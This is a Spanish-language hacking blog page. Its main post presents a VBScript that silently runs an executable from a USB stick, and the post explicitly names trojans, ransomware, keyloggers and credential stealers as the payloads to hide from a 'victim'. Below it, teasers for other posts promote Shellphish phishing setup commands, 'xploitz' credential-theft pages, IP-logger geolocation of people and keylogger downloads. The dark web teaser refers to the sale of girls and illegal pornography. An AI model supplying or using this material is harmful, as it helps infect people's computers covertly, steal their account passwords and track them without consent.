㊜Suscribete!!! Quieres seguir este blog? Participa en el sitio

Selecciona tu idioma

Script VBS atacar desde un dispositivos usb

Publicado en

Los dispositivos USB representan uno de los principales métodos de propagación e infección de malware. ¿Por qué? La respuesta es sencilla: cuando introducimos o conectamos una unidad extraíble en un equipo infectado, la amenaza se copia a sí misma, con atributos de “archivos ocultos” y accesos directos, y tratará de asegurar su ejecución.

Puede hacerlo modificando el Autorun.inf o creando accesos directos a archivos alojados en los dispositivos. Por lo tanto, cuando el usuario hace doble clic en alguno de ellos, el archivo o directorio al que apunta el acceso directo se abrirá y ejecutará la amenaza.


VBScript (abreviatura de Visual Basic Script Edition) es un lenguaje interpretado por el Windows Scripting Host de Microsoft.




Su sintaxis refleja su origen como variación del lenguaje de programación Visual Basic. Ha logrado un apoyo significativo por parte de los administradores de Windows como herramienta de automatización, ya que, conjunta y paralelamente a las mejoras introducidas en los sistemas operativos windows.
vbs nos ayudara a ejecutar programas en segundo plano donde nuestra victima no pueda sospechar lo que aremos en caso de que usemos un payloads ejemplo :virus,troyanos,ramsonware, keylogger, lazagne otros programas que deseamos que se ejecute ya sea un Word,notepad++ ,etc.
el script lo usaremos en una usb para que se ejecute los programas desde nuestra usb ver el vídeo para ver que programas o  herramientas nos ayudara a hackear.

Instrucciones:
-Copiar o descargar el codigo vbs 

Codigo

Set WshShell=CreateObject("WScript.Shell")
WshShell.Run chr(34) & "nombre-del-programa.exe" & Chr(34),0
Set WshShell=Nothing

-Copiar el archivo scrip.vbs en la memoria usb.
-Copiar el archivo o programa en la memoria usb.
Programas adicionales:


-Cambiar el nombre en el Script.vbs por el  archivo que se ejecutara en segundo plano.
-Ejecute el script.vbs desde la usb.

Descargar 
Crear un archivo autorun.inf 
Como personalizar y cambiar el estilo de una memoria flash USB
Los archivos autorun.inf son simples archivos de texto, donde Windows busca las instrucciones que debe seguir con cualquier dispositivo que se inserte en el equipo.
Para crearlo haz lo siguiente:

• Abre el Bloc de notas de Windows y copia y pega lo siguiente:
[AutoRun]
Icon=audifono.ico

• En el menú Archivo escoge: Guardar como
• En nombre escribe: autorun.inf
• En tipo selecciona: Todos los archivos (*.*)
El archivo creado muévalo al interior de tu dispositivo con el icono a utilizar.

Puedes usar cualquier otro icono, solo cámbiale el nombre si es diferente.
También puedes situarlo dentro de una carpeta, en ese caso especifíca la ruta en el autorun.inf, por ejemplo:
Si lo sitúas dentro de una carpeta llamada "iconos", en el autorun.inf usa:
Icon=iconos\audifono.ico

Cualquier imagen se puede convertir a un archivo ICO, por lo que también existe la opción de utilizar una foto propia como el icono del dispositivo.

Pinterest





Autor:
Interesante
Si tienes algún dudas, deja un comentario¿Ha quedado contestada su pregunta? Comparte tu Opinión.

Comentarios

Publicar un comentario

Únete a la conversación y comparte tú Opinión

㊜Luishiño

 ★ ★ ★ ★ ★

Hola soy ぎLuishiño y este es mi Blog personal .. 

Me considero un joven emprendedor,curioso,creativo,alegre y confiable, siempre buscando la manera de mejorar como amigo y persona . Estudio la carrera de ing. sistemas aquí es donde me gusta escribir sobre temas que en su momento me interesan. Aveces sobre mi vida personal y principalmente cosas de programación ,desarrollo web.Aplicaciones,Software, programas que yo mismo las desarrollo y cosas básicas de informática. >⚠ Nadie es como tú y ese es tú súper poder ¯\(°_o)/¯ Sigue mi blog

↪Sígueme en las redes sociales↩

Si tienes algún dudas, deja un comentario¿Ha quedado contestada su pregunta? Comparte tu Opinión

Entradas populares de este blog

Sockberus Autentificación de proxys

Publicado en
Imagen
En ocasiones necesitamos ocultar nuestra IP mientras navegamos y una de las muchas formas de conseguir esto es empleando un proxy SOCKS

¿Que es un servidor proxy?
Es un programa o dispositivo que intercepta las conexiones de red que un cliente hace un servidor remoto. Esta definición de servidor proxy igual no aclara mucho a la mayoría, por eso voy a tratar de hacer una definición menos técnica pero que cualquiera pueda entender. Un servidor proxy es como un intermediario entre nosotros (el cliente) y el vendedor (el servidor remoto). El proxy en esta función de intermediario puede realizar muchas funciones, como por ejemplo ocultar nuestra IP, operaciones de cache, etc.
¿Donde conseguir servidores proxy SOCKS gratuitos?
Existen diversas páginas donde ofrecen listas publicas de servidores SOCKS, y es cierto que en ocasiones puedes encontrar alguno que funcione pero por norma general están tan saturados que son muy lentos, son inestables o simplemente no funcionan.

El protocolo SOCKS 5 o…
Leer más

USB File Resc eliminar virus de accesos directos, recycler y otros malware de tus unidades usb

Publicado en
Imagen
¿Qué es USB File Resc?
USB File Resc es un "Freeware" pequeño programa de bolsillo que sirve para Eliminar y Desinfectar las memorias USB (Discos Extraíbles) infectadas con los virus de accesos directos, recyclers y otros tipos de Malwares. No solo desinfecta tu Disco Extraíble, también desinfecta tu computadora y detiene aquellos procesos malos que generan nuevamente accesos directos.

No necesitas saber de programación, ni de códigos para desinfectar tu equipo, con unos cuantos clics, el programa lo hace todo.

También puede desinfectar tu computadora y detener los malos procesos que generan accesos directos nuevamente.

¿Qué tipos de virus Elimina USB File Resc?
Cada vez USB File Resc se hace mas poderoso, en cada versión vamos agregando nuevos tipos de virus. Aquí tenemos la lista de todos los virus con los que cuenta USB File Resc.


18356update.vbs  59656update.vbs 43312update.vbs 70692update.vbs 99357update.vbs 18356update.vbs 99357update.vbs 99357update.vbs 35566update.vbs 4514…
Leer más

Vulnerabilidad en facebook hackear con xploitz parte II

Publicado en
Imagen
Un xploitz que no es lo mismo que un exploit, es un correo que se envia atraves de una pagina lanzadora de xploit y su funcion es que la victima reciba el correo en hotmail, lo lea y ese correo dice que su cuenta ha sido deshabilitada y te da un link para (supuestamente) habilitarla.  Pero ese link, lo que hace es desviarte a una pagina identica a hotmail.com y te pide que ingreses el usuario y contraseña. Luego de eso se redirecciona a la pagina real de hotmail.com y entra normalmente como si nada hubiese pasado pero el que te envió el xploit a tu correo se queda con la contraseña que ingresaste en la pagina falsa.  Anteriormente publique la primera parte. ¿Qué es un xploitz? Vulnerabilidad en facebook hackear parte IVulnerabilidad en facebook hackear con xploitz parte IIVulnerabilidad en instagram hackear con xploitz parte IIIVulnerabilidad en facebook hackear con xploitz parte IVVulnerabilidad en facebook hackear con xploits3.0 parte V

Ingresamos al link xploitz.net


Le damos a genera…
Leer más

Grabify: geolocalización a través de enlace

Publicado en
Imagen
Grabify: geolocalizar a alguien por medio de un enlace.
En este blog les enseñaré a geolocalizar (localizar) a alguien haciéndole pulsar en un enlace.
En la actualidad existen decenas de servicios que nos permiten acortar las URL. Estos acortadores de URL en muchos casos nos proporcionan estadísticas de cuántos clicks se han realizado. Grabify IP Logger nos permitirá esto y mucho más, ya que también es capaz de realizar un tracking de la IP origen donde se ha dado click al enlace, además de otras funciones muy interesantes.
✎Características de la herramienta online Grabify IP Logger Esta herramienta gratuita Grabify IP Logger nos va a permitir crear un enlace acortado de manera fácil y rápida, pero es que además cuando el usuario le de click al dicho enlace, obtendremos los siguientes datos de él: Dirección IP de origen desde donde se ha pinchadoPaís de origen desde donde se ha pinchadoUser Agent para saber desde qué navegador web se ha pinchado en el enlaceEl nombre del host desde don…
Leer más

¿Qué es Deep Web, Dark Web y Darknet?

Publicado en
Imagen
Primeramente, la dark web no es lo mismo que la deep web, muchos piensan que para entrar a la deep web necesitan Tor y VPN, y es completamente falso, la deep web son los sitios que no encuentras buscando tal como el gore mas fuerte, si buscas gore en chrome no habran paginas, pero si buscas una pagina de gore como bestgore, podrás acceder, algunas cosas pueden ser a través por adfly, etc, todo lo que buscas en chrome que no te aparece, es la deep web, solo lo ves si tienes el nombre de la pagina en especifico o el link, por ejemplo, en chrome aunque no lo crean hay varias cosas que no encuentras convencionalmente buscando como la necrofilia real, hay sitios en chrome donde lo hay. Entonces la deep web, esta en google y no necesitas Tor ni vpn par acceder.
La darkweb, es el sitio   .onion que para acceder ye necesitas Tor y una VPN (vpn es opcional), ya que los sitios mas fuertes como la red room y mas paginas de venta de drogas, armas, niñas, pornografia ilegal, etc.

No puedes entrar…
Leer más

Termux Instalar y usar Shellphish

Publicado en
Imagen
¿Qué es?
Herramienta de phishing para 18 redes sociales: Instagram, Facebook, Snapchat, Github, Twitter, Yahoo, Protonmail, Spotify, Netflix, Linkedin, WordPress, Origin, Steam, Microsoft, InstaFollowers, Gitlab, Pinterest.

Comunidad amino hacking
Requisitos:

-Tener instalado termux (android +5)-Lo pueden usar desde un teléfono o emulador.
Características:
Este programa usa Ngrok y Serveo para crear un link con las paginas clonadas.
Pasos a seguir:
1.- pkg install git

2.- git clone https://github.com/thelinuxchoice/shellphish

3.- cd shellphish

4.- chmod +x shellphish.sh

5.- ./shellphish.sh

6.- pkg install php
pkg install wget
8.- pkg install curl
9.- pkg install ssh
10.- pkg install SSH
11.- pkg install openssh
12.- ./shellphish
Opcional
pkg install url
pkg install serveo

Elegimos el una red social que deseamos usar o clonar.



Si sale error en generar el link  volver a intentar , personalmente lo intentando como 5 veces cambiando el número de puerto a 80,3330,3334


Una vez generado el link enviamos a la vic…
Leer más

¿Cuales son los Password attacks? (Ataques por Password)

Publicado en
Imagen
Hoy en día nuestro dispositivos móviles y las computadoras transportan una gran cantidad de datos confidenciales e importantes, por lo que mantener la seguridad de los datos del trabajo. Es recordable cambiar las las contraseñas de manera periódica.Cambiar la contraseña evita una serie de peligros, incluidos algunos que son menos obvios, como lo que ocurre con las contraseñas que ha guardado en equipos que ya no son de tu propiedad. Es bueno usar claves seguras porque, si bien los atacantes no pueden usar fuerza bruta en cuentas online, pueden usarla para descifrar hashes y predecir contraseñas incluidas en bases filtradas.    ╔═══════ ≪ °❈° ≫ ═══════╗    ╚═══════ ≪ °❈° ≫ ═══════╝ ✎Password attacks El ataque de diccionario es un intento de entrada en un sistema digital que utiliza una lista de contraseñas posibles, probando de uno a la vez. Básicamente, es una forma evolucionada y avanzada del método de prueba y error, ya que trae resultados rápidos y eficientes. También se le asocia al ataq…
Leer más

USBDeview permite administrar todos los dispositivos USB conectados al ordenador

Publicado en
Imagen
Hoy en día son muchos los dispositivos que conectamos a nuestro ordenador a través de los puertos USB. Aunque desde el explorador de archivos de Windows podemos ver todos estos puertos y saber si tenemos un dispositivo conectado, nunca está de más poder contar con una herramienta con la que poder gestionar todos estos dispositivos conectados a nuestro equipo.
Si alguna vez te has preguntado cuantos dispositivos USB has enchufado en tu sistema o simplemente quieres saber si alguien ha conectado alguno a un pc en particular, hoy te vamos a presentar una utilidad llamada USBDeview que te va a ayudar enormemente. USBDeview es una pequeña utilidad que permite mostrar los dispositivos USB conectados actualmente al PC y los que estuvieron conectados en el pasado.USBDeview proporciona información variada sobre estos dispositivos, entre ellos: nombre del dispositivo, fecha de conexión, tipo de dispositivo, desconexión segura, identificador del fabricante, etcetera.USBDeview también permite reali…
Leer más

Introducción a la programación parte III

Publicado en
Imagen
Estructura de un programa informático
Un programa informático (programa) es una secuencia de acciones (instrucciones) que manipulan un conjunto de objetos (datos). Existen dos partes o bloques que componen un programa: Bloque de declaraciones: en este se detallan todos los objetos que utiliza el programa (constantes, variables, archivos, etc).
Anteriormente publique estos temas lo encontras el aquí :
Introducción a la programación parte I
https://www.lpericena.tk/2019/07/introduccion-la-programacion.html
Introducción a la programación parte II
https://www.lpericena.tk/2019/07/introduccion-la-programacion-ii.html

Palabra reservada
Cada una tienen un significado especial por el cual no pueden ser utilizado para otro propósito

Absolote,And,Array,Asm,Begin,Case,Const,Constructor,Destructor,Div,Do,DownTo,Else,End,External,File,For,Forward,Function,Goto,If,Implementation,In,Inherite,Inline,Interface,Interrpt,Label,Mod,Nil,Not,Object,Of,Or,Packed,Procedure,Program,Record,Repeat,Set, Shl,Shr,Stri…
Leer más

Hackear facebook y gmail con node.js método phishing

Publicado en
Imagen
¿Qué es y para que sirve NodeJS? NodeJS es un código abierto de JavaScript (razón por la cual se incluye el distintivo JS) que está diseñado para generar aplicaciones web de forma altamente optimizada. Desde su nacimiento hacia el año 2009 ha logrado convertirse en todo un must dentro del desarrollo web.
JavaScript
es un sólo un lenguaje de programación del lado del cliente que se ejecuta en el navegador, ¿verdad?. Ahora ya no. Node.js es una forma de ejecutar JavaScript en el servidor, además de mucho más. Node.js es un entorno Javascript del lado del servidor, basado en eventos.




Donación paypal https://www.paypal.com/cgi-bin/webscr?cmd=_s-xclick&hosted_button_id=MJPRV838AYA2J&source=url https://join-adf.ly/21179079 Cursos Node js  Descargar y instalar Nodejs clase #1Servidor HTTP con nodejs - clase #2Express para crear un servidor HTTP con nodejs - clase #3Módulos centrales Node.js - clase 4Mi primera app con Node.js - clase #5Proyecto phishing hacking con node.js -clases #6Facebo…
Leer más

Entradas populares de este blog

USB File Resc eliminar virus de accesos directos, recycler y otros malware de tus unidades usb

Publicado en
Imagen
¿Qué es USB File Resc?
USB File Resc es un "Freeware" pequeño programa de bolsillo que sirve para Eliminar y Desinfectar las memorias USB (Discos Extraíbles) infectadas con los virus de accesos directos, recyclers y otros tipos de Malwares. No solo desinfecta tu Disco Extraíble, también desinfecta tu computadora y detiene aquellos procesos malos que generan nuevamente accesos directos.

No necesitas saber de programación, ni de códigos para desinfectar tu equipo, con unos cuantos clics, el programa lo hace todo.

También puede desinfectar tu computadora y detener los malos procesos que generan accesos directos nuevamente.

¿Qué tipos de virus Elimina USB File Resc?
Cada vez USB File Resc se hace mas poderoso, en cada versión vamos agregando nuevos tipos de virus. Aquí tenemos la lista de todos los virus con los que cuenta USB File Resc.


18356update.vbs  59656update.vbs 43312update.vbs 70692update.vbs 99357update.vbs 18356update.vbs 99357update.vbs 99357update.vbs 35566update.vbs 4514…
Leer más

¿Qué es un xploitz? Vulnerabilidad en facebook hackear parte I

Publicado en
Imagen
Exploit es una palabra inglesa que significa explotar o aprovechar, y que en el ámbito de la informática es un fragmento de software, fragmento de datos o secuencia de comandos o acciones, utilizada con el fin de aprovechar una vulnerabilidad de seguridad de un sistema de información para conseguir un comportamiento no deseado del mismo. Ejemplos de comportamiento erróneo: Acceso de forma no autorizada, toma de control de un sistema de cómputo, consecución privilegios no concedidos lícitamente, consecución de ataques de denegación de servicio. Hay que observar que el término no se circunscribe a piezas de software, por ejemplo, cuando lanzamos un ataque de ingeniería social, el ardid o discurso que preparamos para convencer a la víctima también se considera un exploit,1​ que busca poder así capturar cierta información de la víctima a través de este tipo de ataque.
¿Qué es un xploitz? Vulnerabilidad en facebook hackear parte IVulnerabilidad en facebook hackear con xploitz parte IIVulne…
Leer más

Vulnerabilidad en facebook hackear con xploitz parte II

Publicado en
Imagen
Un xploitz que no es lo mismo que un exploit, es un correo que se envia atraves de una pagina lanzadora de xploit y su funcion es que la victima reciba el correo en hotmail, lo lea y ese correo dice que su cuenta ha sido deshabilitada y te da un link para (supuestamente) habilitarla.  Pero ese link, lo que hace es desviarte a una pagina identica a hotmail.com y te pide que ingreses el usuario y contraseña. Luego de eso se redirecciona a la pagina real de hotmail.com y entra normalmente como si nada hubiese pasado pero el que te envió el xploit a tu correo se queda con la contraseña que ingresaste en la pagina falsa.  Anteriormente publique la primera parte. ¿Qué es un xploitz? Vulnerabilidad en facebook hackear parte IVulnerabilidad en facebook hackear con xploitz parte IIVulnerabilidad en instagram hackear con xploitz parte IIIVulnerabilidad en facebook hackear con xploitz parte IVVulnerabilidad en facebook hackear con xploits3.0 parte V

Ingresamos al link xploitz.net


Le damos a genera…
Leer más

Sockberus Autentificación de proxys

Publicado en
Imagen
En ocasiones necesitamos ocultar nuestra IP mientras navegamos y una de las muchas formas de conseguir esto es empleando un proxy SOCKS

¿Que es un servidor proxy?
Es un programa o dispositivo que intercepta las conexiones de red que un cliente hace un servidor remoto. Esta definición de servidor proxy igual no aclara mucho a la mayoría, por eso voy a tratar de hacer una definición menos técnica pero que cualquiera pueda entender. Un servidor proxy es como un intermediario entre nosotros (el cliente) y el vendedor (el servidor remoto). El proxy en esta función de intermediario puede realizar muchas funciones, como por ejemplo ocultar nuestra IP, operaciones de cache, etc.
¿Donde conseguir servidores proxy SOCKS gratuitos?
Existen diversas páginas donde ofrecen listas publicas de servidores SOCKS, y es cierto que en ocasiones puedes encontrar alguno que funcione pero por norma general están tan saturados que son muy lentos, son inestables o simplemente no funcionan.

El protocolo SOCKS 5 o…
Leer más

Programa Revealer Keylogger Pro

Publicado en
Imagen
Un Keylogger es un software o hardware que puede  guardar las pulsaciones realizadas en el teclado de un ordenador. Como podemos ver hay programas que son muy útiles como para recuperar contraseñas olvidadas ya sea de cualquier sitio web.

Comunidad de amino hacking
Este programa Revealer Keylogger Protambién beneficias a los padres ya que no hay un control total de sus hijos sobre las tecnologías lo pondrían usar , para ver en que sitio web entran sus hijos(as) o donde ingresan.
Para descargar el programa Revealer Keylogger Pro 



DESCARGAR


Leer más

¡Bienvenido!

a la web de seguridad de la información the seven codes. Estimado Visitante, Te doy la más cordial bienvenida Atte:ぎLuishiño. Esperamos que encuentre la información que tú busca y que como resultado, me vea favorecido con su elección y preferencia. En este blog podrás encontrar muchas cosas de su utilidad, desde herramientas, manuales,comandos, artículos, tutoriales todo el contenido es totalmente gratuito hazta consejos los cuales ayudaran a seguir ampliando su conocimiento & siga aumentando tú pasión por la informática. Te deseo mucha éxito & suerte que te diviertas con el contenido del blog. Si quieres colaborar con algún contenido lo puedes hacer de forma abierta en la comunidad cyber hacking o en el whatsapp , se publicara tu articulo mas tus redes sociales para que puedan seguirte. ❯❯Más información

¯\(°_o)/¯ Sígueme en mi blog

Mira este video y sorprendete

Tu y Las Redes Sociales

Tu y Las Redes Sociales

Publicada por Servicio Técnico "The Seven Codes " en Martes, 5 de diciembre de 2019

"Es tiempo que te preguntes, si eres libre y si te gusta como ellos te obligan a vivir."

Libros

by @Luishiño! Publicado en abril 14, 2019

Hackear con ataque de diccionario fuerza bruta | Facebook

Contacto ! Más información

$9.99

Libros

by @Luishiño! Publicado en abril 14, 2019

Ingenieria inversas hackeando Aplicaciones de Android | apk infect

Contacto ! Más información

$5.99

Libros

by @Luishiño! Publicado en abril 14, 2019

Doxing - Espionaje y recopilación de Información | Facebook

Contacto ! Más información

$3.99

Libros

by @Luishiño! Publicado en abril 14, 2019

Metodo phishing Hackear con xploits 3.0 ! Facebook

Contacto ! Más información

$20.99

Servicio Técnico "The Seven Codes "